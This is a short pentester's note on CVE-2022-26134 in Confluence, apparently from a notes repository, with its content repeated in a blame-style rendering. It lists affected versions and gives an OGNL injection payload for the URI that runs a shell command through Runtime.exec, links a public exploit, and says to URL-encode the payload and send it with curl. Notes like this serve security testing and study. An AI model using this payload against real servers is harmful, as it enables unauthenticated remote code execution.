killchain-compendium/exploit/java/OGNL/cve_2022_26134.md

# CVE-2022-26134

* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Confluence versions:
    * 1.3.0 to 7.4.17
    * 7.13.0 to 7.13.7
    * 7.14.0 to 7.14.3 
    * 7.15.0 to 7.15.2 
    * 7.16.0 to 7.16.4
    * 7.17.0 to 7.17.4
    * 7.18.0 to 7.18.1 
* Object Graph Navigation Language (OGNL)

## Usage

* Payload is a GET request which is set via the URI
```sh
 ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL encode and curl for PoC

* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)
AD stuff 2022-07-06 22:49:06 +02:00			`# CVE-2022-26134`

			`* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)`
			`* Confluence versions:`
			`* 1.3.0 to 7.4.17`
			`* 7.13.0 to 7.13.7`
			`* 7.14.0 to 7.14.3`
			`* 7.15.0 to 7.15.2`
			`* 7.16.0 to 7.16.4`
			`* 7.17.0 to 7.17.4`
			`* 7.18.0 to 7.18.1`
			`* Object Graph Navigation Language (OGNL)`

			`## Usage`

			`* Payload is a GET request which is set via the URI`
			```sh
			`${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/`
			```
			`* URL encode and curl for PoC`

			`* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)`